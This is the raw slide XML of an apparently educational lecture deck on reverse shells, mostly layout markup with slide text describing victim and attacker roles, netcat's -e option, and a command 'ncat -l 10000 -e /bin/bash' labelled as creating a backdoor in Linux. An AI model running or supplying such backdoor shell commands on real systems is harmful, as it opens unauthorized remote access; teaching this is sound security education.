            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3">
              <a:extLst/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="6579818" y="6463892"/>
              <a:ext cx="5434478" cy="101604"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="34" name="Picture 33"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3">
              <a:extLst/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="6579818" y="7937137"/>
              <a:ext cx="5434478" cy="101604"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="35" name="Picture 34"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3">
              <a:extLst/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="6579818" y="8428218"/>
              <a:ext cx="5434478" cy="101604"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="36" name="Shape 213"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" flipV="1">
              <a:off x="12026615" y="6185254"/>
              <a:ext cx="1092679" cy="380241"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="25400">
              <a:solidFill/>
              <a:miter lim="400000"/>
              <a:tailEnd type="triangle"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr lIns="67735" tIns="67735" rIns="67735" bIns="67735" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr lvl="0">
                <a:defRPr sz="2400"/>
              </a:pPr>
              <a:endParaRPr sz="3200"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="37" name="Shape 214"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="12117936" y="7804899"/>
              <a:ext cx="838107" cy="523630"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="25400">
              <a:solidFill/>
              <a:miter lim="400000"/>
              <a:tailEnd type="triangle"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr lIns="67735" tIns="67735" rIns="67735" bIns="67735" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr lvl="0">
                <a:defRPr sz="2400"/>
              </a:pPr>
              <a:endParaRPr sz="3200"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="38" name="Shape 215"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="8298014" y="6294553"/>
              <a:ext cx="2390972" cy="1"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="25400">
              <a:solidFill/>
              <a:miter lim="400000"/>
              <a:tailEnd type="triangle"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr lIns="67735" tIns="67735" rIns="67735" bIns="67735" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr lvl="0">
                <a:defRPr sz="2400"/>
              </a:pPr>
              <a:endParaRPr sz="3200"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="39" name="Shape 216"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8233576" y="8233479"/>
              <a:ext cx="2519848" cy="1"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="25400">
              <a:solidFill/>
              <a:miter lim="400000"/>
              <a:tailEnd type="triangle"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr lIns="67735" tIns="67735" rIns="67735" bIns="67735" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr lvl="0">
                <a:defRPr sz="2400"/>
              </a:pPr>
              <a:endParaRPr sz="3200"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="40" name="Shape 217"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8901674" y="5449115"/>
              <a:ext cx="569604" cy="526580"/>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1900" b="1">
                  <a:latin typeface="Helvetica"/>
                  <a:ea typeface="Helvetica"/>
                  <a:cs typeface="Helvetica"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr lvl="0">
                <a:defRPr sz="1800" b="0"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="2533" dirty="0" err="1"/>
                <a:t>tcp</a:t>
              </a:r>
              <a:endParaRPr sz="2533" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="41" name="Shape 218"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9012255" y="8642463"/>
              <a:ext cx="569604" cy="526580"/>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sz="1900" b="1">
                  <a:latin typeface="Helvetica"/>
                  <a:ea typeface="Helvetica"/>
                  <a:cs typeface="Helvetica"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr lvl="0">
                <a:defRPr sz="1800" b="0"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="2533"/>
                <a:t>tcp</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="42" name="Shape 219"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="13351926" y="6095010"/>
              <a:ext cx="3841633" cy="1112535"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="12700">
              <a:miter lim="400000"/>
            </a:ln>
            <a:extLst>
              <a:ext uri="{C572A759-6A51-4108-AA02-DFA0A04FC94B}">
                <ma14:wrappingTextBoxFlag xmlns:ma14="http://schemas.microsoft.com/office/mac/drawingml/2011/main" xmlns="" val="1"/>
              </a:ext>
            </a:extLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="67735" tIns="67735" rIns="67735" bIns="67735" anchor="ctr">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr lvl="0">
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="1600" dirty="0" smtClean="0"/>
                <a:t>puts </a:t>
              </a:r>
              <a:r>
                <a:rPr sz="1600" dirty="0"/>
                <a:t>input</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="43" name="Shape 220"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="13246136" y="7266129"/>
              <a:ext cx="4764401" cy="1112535"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="12700">
              <a:miter lim="400000"/>
            </a:ln>
            <a:extLst>
              <a:ext uri="{C572A759-6A51-4108-AA02-DFA0A04FC94B}">
                <ma14:wrappingTextBoxFlag xmlns:ma14="http://schemas.microsoft.com/office/mac/drawingml/2011/main" xmlns="" val="1"/>
              </a:ext>
            </a:extLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="67735" tIns="67735" rIns="67735" bIns="67735" anchor="ctr">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr lvl="0">
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="1600" dirty="0" smtClean="0"/>
                <a:t>receive</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
                <a:t> output</a:t>
              </a:r>
              <a:endParaRPr sz="1600" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="45" name="Picture 44"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7256813" y="2779099"/>
            <a:ext cx="1017874" cy="653136"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="Shape 198"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="581185" y="3541811"/>
            <a:ext cx="641739" cy="50612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b="1">
                <a:solidFill>
                  <a:srgbClr val="00882B"/>
                </a:solidFill>
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800" b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Server </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800" b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/ Victim</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47" name="Shape 197"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7350303" y="3506829"/>
            <a:ext cx="830894" cy="506125"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{C572A759-6A51-4108-AA02-DFA0A04FC94B}">
              <ma14:wrappingTextBoxFlag xmlns:ma14="http://schemas.microsoft.com/office/mac/drawingml/2011/main" xmlns="" val="1"/>
            </a:ext>
          </a:extLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="67735" tIns="67735" rIns="67735" bIns="67735" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr b="1">
                <a:solidFill>
                  <a:srgbClr val="C82506"/>
                </a:solidFill>
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800" b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Client</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr sz="1800" b="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/ Attacker </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1026" name="Picture 2" descr="Image result for attack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85833" y="1135844"/>
            <a:ext cx="742539" cy="742539"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="49" name="Straight Arrow Connector 48"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1026" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1170958" y="1507114"/>
            <a:ext cx="2514875" cy="1079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581185" y="1489141"/>
            <a:ext cx="2325165" cy="738664"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1. Let a victim </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Send</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> a signal to activate the communication </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>channel</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="52" name="TextBox 51"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5845441" y="1357407"/>
            <a:ext cx="2349732" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>listen </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>to a hidden communication </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>channel</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="53" name="Straight Arrow Connector 52"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4454981" y="1507114"/>
            <a:ext cx="3084644" cy="1079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05542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4561" y="1443726"/>
            <a:ext cx="3124747" cy="1384995"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: program to execute after connection </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>occures</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>., connecting STDIN and STDOUT to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>program</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cmd.exe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: a shell command for Windows</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Left-Right Arrow 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3317055" y="907409"/>
            <a:ext cx="1263056" cy="15829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
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="243402" y="4512942"/>
            <a:ext cx="3506298" cy="282724"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="36363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1415" rIns="0" bIns="7141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err="1" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial Unicode MS" panose="020B0604020202020204" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Monaco"/>
              </a:rPr>
              <a:t>ncat</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial Unicode MS" panose="020B0604020202020204" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Monaco"/>
              </a:rPr>
              <a:t> -l 10000 -e /bin/bash    //</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="900" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial Unicode MS" panose="020B0604020202020204" pitchFamily="34" charset="-128"/>
                <a:ea typeface="Monaco"/>
              </a:rPr>
              <a:t>if create a backdoor in Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="en-US" sz="600" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="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 name="TextBox 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="64561" y="165325"/>
            <a:ext cx="1808508" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Victim sends signals</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="6" name="Straight Arrow Connector 5"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="2" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1752620" y="319214"/>
            <a:ext cx="120449" cy="318582"/>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
        <p:nvSpPr>
          <p:cNvPr id="13" name="TextBox 12"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3189308" y="94789"/>
            <a:ext cx="1518549" cy="430887"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Attacker listens port 8080 first</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="8" name="Straight Arrow Connector 7"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="13" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3948583" y="512750"/>
            <a:ext cx="928523" cy="12926"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5197258" y="0"/>
            <a:ext cx="3933662" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="659566"/>
            <a:ext cx="2968566" cy="702166"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9513569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Extra credits: Another approach for reverse shell</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{E24DD715-7292-4FAD-A484-09D5D92FAB07}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>24</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="821067" y="1047425"/>
            <a:ext cx="5790241" cy="3885556"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6187002" y="0"/>
            <a:ext cx="2956998" cy="200055"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="700" dirty="0"/>
              <a:t>https://stackoverflow.com/questions/35271850/what-is-a-reverse-shell</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1385115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Summary</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="747924" y="1302837"/>
            <a:ext cx="7451195" cy="3610800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>There are two places programs send output to: Standard output (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>stdout</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
